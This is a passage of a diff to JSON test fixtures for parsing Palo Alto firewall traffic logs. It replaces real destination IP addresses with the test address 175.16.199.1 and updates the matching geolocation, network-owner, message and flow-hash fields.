"event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.283863552Z", - "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25308,1,55766,53,0,0,0x200000,udp,allow,74,74,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381668800Z", + "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25308,1,55766,53,0,0,0x200000,udp,allow,74,74,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -841,24 +844,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -877,7 +882,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,26376,1,55072,53,0,0,0x200000,udp,allow,74,74,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,26376,1,55072,53,0,0,0x200000,udp,allow,74,74,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -911,7 +916,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:f08UBDqcNW5jC3R+i40XfD1g8l8=", + "community_id": "1:AEjQ0MYEFyts5DOUSkd6snMeUZM=", "transport": "udp", "application": "dns", "type": "ipv4", @@ -949,14 +954,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.283868102Z", - "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,26376,1,55072,53,0,0,0x200000,udp,allow,74,74,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381674200Z", + "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,26376,1,55072,53,0,0,0x200000,udp,allow,74,74,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -979,27 +984,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 806, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 4 }, "rule": { @@ -1018,7 +1022,7 @@ }, "packets": 6 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25118,1,59207,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25118,1,59207,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", "panw": { "panos": { "ruleset": "rule1", @@ -1052,7 +1056,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:kGyE7FdnFLrk4Cc6NHaD5WeE81A=", + "community_id": "1:OubaUyUFYfBa05WxsTDcSGq6qdo=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -1090,14 +1094,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 1000000000, - "ingested": "2021-09-08T12:38:09.283872518Z", - "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25118,1,59207,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", + "ingested": "2021-12-09T13:43:22.381679500Z", + "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25118,1,59207,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -1120,27 +1124,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 806, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 4 }, "rule": { @@ -1159,7 +1162,7 @@ }, "packets": 6 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26146,1,59209,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:28,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26146,1,59209,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:28,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", "panw": { "panos": { "ruleset": "rule1", @@ -1193,7 +1196,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:pxN/AvFcFozLjRgniFdZmScORYQ=", + "community_id": "1:wrjvr39KOJdRAr4D6/DhjQskkpQ=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -1231,14 +1234,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.283876974Z", - "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26146,1,59209,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:28,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", + "ingested": "2021-12-09T13:43:22.381684800Z", + "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26146,1,59209,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:28,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -1261,27 +1264,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 806, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 4 }, "rule": { @@ -1300,7 +1302,7 @@ }, "packets": 6 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25272,1,59208,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25272,1,59208,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", "panw": { "panos": { "ruleset": "rule1", @@ -1334,7 +1336,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:HmuQtYxq+NpgJ0zVEIpz7zLNOKM=", + "community_id": "1:vVKdp0O16Den9irRVjMMfrNiAJI=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -1372,14 +1374,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 1000000000, - "ingested": "2021-09-08T12:38:09.283881574Z", - "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25272,1,59208,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", + "ingested": "2021-12-09T13:43:22.381690100Z", + "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25272,1,59208,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -1402,27 +1404,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -1441,7 +1442,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,24069,1,59318,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,24069,1,59318,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -1475,7 +1476,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:I7NZAEypUvCTVa5iVWyAsWeEWgY=", + "community_id": "1:YgO6m4pYjlO/px7eSvDVXMyhT9w=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -1513,14 +1514,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.283886168Z", - "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,24069,1,59318,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381695400Z", + "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,24069,1,59318,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -1543,27 +1544,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -1582,7 +1582,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25848,1,59317,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25848,1,59317,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -1616,7 +1616,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:GOqfpUTezPkpm6axBI22kY90kU4=", + "community_id": "1:36riPo5QLmTmjShd1xO6omV9lbg=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -1654,14 +1654,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.283891148Z", - "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25848,1,59317,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381701200Z", + "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25848,1,59317,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -1684,27 +1684,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -1723,7 +1722,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25179,1,59316,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25179,1,59316,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -1757,7 +1756,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:aiB5YppFUGX0pM/1Xtp3qOSFXJw=", + "community_id": "1:6fDJsdstw4iPHg4mtYfqCIw/9W8=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -1795,14 +1794,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.283895774Z", - "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25179,1,59316,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381706400Z", + "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25179,1,59316,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -1825,27 +1824,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -1864,7 +1862,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25112,1,59315,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25112,1,59315,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -1898,7 +1896,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:ghLw4NDj0JmAhH9lVtlhdQpqEQ0=", + "community_id": "1:CvgumdBliLFimUvrE/1C91M3lrQ=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -1936,14 +1934,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.283900357Z", - "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25112,1,59315,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381711800Z", + "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25112,1,59315,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -1966,27 +1964,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 806, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 4 }, "rule": { @@ -2005,7 +2002,7 @@ }, "packets": 6 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26161,1,59206,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26161,1,59206,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", "panw": { "panos": { "ruleset": "rule1", @@ -2039,7 +2036,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:SIxV4kkvJlBljF+gLKAaihputgk=", + "community_id": "1:TcEOieIy4pig/edaJwIxupG/GL8=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -2077,14 +2074,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.283928233Z", - "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26161,1,59206,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", + "ingested": "2021-12-09T13:43:22.381717100Z", + "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26161,1,59206,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -2107,27 +2104,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 806, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 4 }, "rule": { @@ -2146,7 +2142,7 @@ }, "packets": 